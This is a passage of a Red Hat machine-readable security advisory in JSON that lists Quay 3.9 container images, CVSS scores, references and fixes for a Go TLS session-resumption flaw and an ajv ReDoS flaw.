"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "RHBZ#2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://go.dev/cl/737700",
"url": "https://go.dev/cl/737700"
},
{
"category": "external",
"summary": "https://go.dev/issue/77217",
"url": "https://go.dev/issue/77217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk",
"url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4337",
"url": "https://pkg.go.dev/vuln/GO-2026-4337"
}
],
"release_date": "2026-02-05T17:48:44.141000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-19T19:18:06+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5168"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption"
},
{
"cve": "CVE-2025-69873",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-11T19:01:32.953264+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439070"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ajv: ReDoS via $data reference",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, the $data option must be enabled and the attacker needs to be able to send a payload with a specially crafted regular expression to the application processing the input. A 31-character payload causes approximately 44 seconds of execution, with each additional character doubling the execution time. Therefore, even a small payload can cause an application to become unresponsive and eventually result in a denial of service. Due to this reason, this flaw has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "RHBZ#2439070",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439070"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-69873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69873"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md",
"url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md"
}
],
"release_date": "2026-02-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-19T19:18:06+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5168"
},
{
"category": "workaround",
"details": "To mitigate this issue, disable the $data feature if your application does not require it. If $data must be used, implement strict validation of the input fields that are referenced by the pattern keyword to ensure they contain only expected and safe characters.",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ajv: ReDoS via $data reference"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
